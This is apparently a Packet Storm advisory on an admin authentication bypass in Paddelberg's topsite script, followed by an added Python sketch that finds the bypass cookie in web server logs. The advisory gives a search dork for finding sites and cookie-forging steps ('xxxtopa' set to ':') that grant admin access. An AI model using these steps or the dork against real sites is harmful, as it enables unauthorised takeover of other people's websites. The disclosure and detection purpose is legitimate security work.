Paddelberg Topsite Script Insecure Cookie

2012-01-09T00:00:00
ID PACKETSTORM:108481
Type packetstorm
Reporter Christian Inci
Modified 2012-01-09T00:00:00

Description

                                        
`# Exploit Title: Paddelberg's topsite-script admin auth bypass.  
# Google Dork: intext:"powered by php scripte webmaster resource"  
# Date: 8. 1. 2012  
# Author: Christian Inci  
# Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/  
# Version: <= 1.23 (22. 9. 2007)  
# Tested on: 1.23  
# Vendor response: None, as I didn't contact them.  
  
PoC/Exploit:  
1.: Open a random cookie editor.  
2.: Create a cookie, as usual:  
2.1: Set the host name.  
2.2: Set the path name. (e.g.: "[script-base-path]/admin/")  
2.3: Set the cookie name to "xxxtopa".  
2.4: Set the cookie value to ":".  
2.5: Save it.  
3.: Visit the following URL: "[script-base-url]/admin/". (This won't work if the directory is "protected" with a .htaccess file.)  
4.: Do whatever you like to do here. (Have fun!)  
  
  
`
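
For defenders, the request described in the steps above leaves a recognisable trace when the web server logs the Cookie header. The following detection sketch is an added example, not part of the original advisory. It assumes an Apache "combined" log format with `%{Cookie}i` appended as a final quoted field, and the log lines in it are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: Apache "combined" format with "%{Cookie}i" appended as a last quoted field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)
COOKIE_NAME = "xxxtopa"    # cookie name from the advisory
BYPASS_VALUE = ":"         # cookie value from the advisory
ADMIN_SEGMENT = "/admin/"  # admin directory from the advisory

# Constructed sample log lines (documentation IP ranges, made-up paths and sizes).
SAMPLE_LOG = """\
192.0.2.10 - - [09/Jan/2012:10:00:01 +0100] "GET /topsite/index.php HTTP/1.1" 200 8312 "-" "Mozilla/5.0" "-"
192.0.2.11 - - [09/Jan/2012:10:02:17 +0100] "GET /topsite/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "xxxtopa=constructed-value"
198.51.100.7 - - [09/Jan/2012:10:05:43 +0100] "GET /topsite/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "xxxtopa=:"
198.51.100.7 - - [09/Jan/2012:10:05:59 +0100] "GET /topsite/admin/index.php HTTP/1.1" 200 6044 "-" "Mozilla/5.0" "lang=de; xxxtopa=%3A"
203.0.113.5 - - [09/Jan/2012:11:30:02 +0100] "GET /list/admin/ HTTP/1.1" 401 401 "-" "Mozilla/5.0" "xxxtopa=:"
""".splitlines()


def parse_cookies(header):
    """Split a Cookie header into (name, URL-decoded value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, unquote(value)))
    return pairs


def find_bypass_attempts(lines):
    """Return (ip, timestamp, path, status) for admin requests carrying the bypass cookie."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or ADMIN_SEGMENT not in m["path"]:
            continue
        cookies = parse_cookies(m["cookie"])
        if any(n == COOKIE_NAME and v.strip() == BYPASS_VALUE for n, v in cookies):
            hits.append((m["ip"], m["ts"], m["path"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, ts, path, status in find_bypass_attempts(SAMPLE_LOG):
        # A 2xx status means the admin page was served; 401/403 suggests .htaccess protection held.
        print(f"{ts} {ip} {path} -> {status}")
```

The status code in each hit separates requests that reached the admin page from those stopped by the `.htaccess` protection the advisory mentions.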